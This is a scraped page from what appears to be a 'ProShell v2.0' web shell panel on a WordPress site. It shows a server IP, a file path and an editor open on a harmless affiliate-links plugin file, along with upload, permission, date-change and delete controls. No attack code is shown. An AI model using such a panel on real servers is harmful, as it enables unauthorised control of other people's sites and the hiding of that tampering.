ProShell v2.0
Dashboard
Server Info
Server: 158.106.128.192
PHP: 8.2.33
home
planet5
public_html
bansibaba.com
wp-includes
2026-09-16 14:56:44
Editing: class-eafl-activator.php
Cancel
Save Changes
<?php /** * Fired during plugin activation. * * @link https://bootstrapped.ventures * @since 2.0.0 * * @package Easy_Affiliate_Links * @subpackage Easy_Affiliate_Links/includes */ /** * Fired during plugin activation. * * This class defines all code necessary to run during the plugin's activation. * * @since 2.0.0 * @package Easy_Affiliate_Links * @subpackage Easy_Affiliate_Links/includes * @author Brecht Vandersmissen <brecht@bootstrapped.ventures> */ class EAFL_Activator { /** * Execute this on activation of the plugin. * * @since 2.0.0 */ public static function activate() { add_option( 'eafl_activated', true ); update_option( 'eafl_flush', '1' ); } }
Upload Files
Cancel
Upload
Create New
Cancel
Create
Change Permissions
Cancel
Save
Change Date
Cancel
Save
Rename Item
Cancel
Save
Confirm Delete
Are you sure you want to delete the selected items?
Cancel
Delete